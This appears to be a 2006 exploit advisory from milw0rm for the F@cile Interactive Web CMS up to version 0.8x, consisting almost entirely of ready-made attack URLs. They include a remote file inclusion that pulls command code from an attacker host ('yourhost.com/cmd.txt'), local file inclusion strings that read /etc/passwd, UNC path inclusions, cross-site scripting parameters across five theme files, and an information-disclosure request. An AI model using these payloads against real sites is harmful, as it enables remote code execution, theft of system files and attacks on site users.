28 lines
No EOL
1.7 KiB
Text
28 lines
No EOL
1.7 KiB
Text
F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities
|
|
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
|
|
This exploits works on F@cile Interactive Web <= 0.8x
|
|
Original advisory can be found at: http://www.nukedx.com/?viewdoc=35
|
|
File Inclusion Vulnerabilities.
|
|
http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt?
|
|
http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00
|
|
http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
|
|
http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5
|
|
http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd
|
|
http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5
|
|
http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00
|
|
http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00
|
|
http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00
|
|
http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00
|
|
http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00
|
|
Cross Site Scripting.
|
|
http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS
|
|
http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS
|
|
http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS
|
|
http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS
|
|
http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS
|
|
Information disclosure
|
|
http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00
|
|
|
|
# nukedx.com [2006-05-27]
|
|
|
|
# milw0rm.com [2006-05-28] |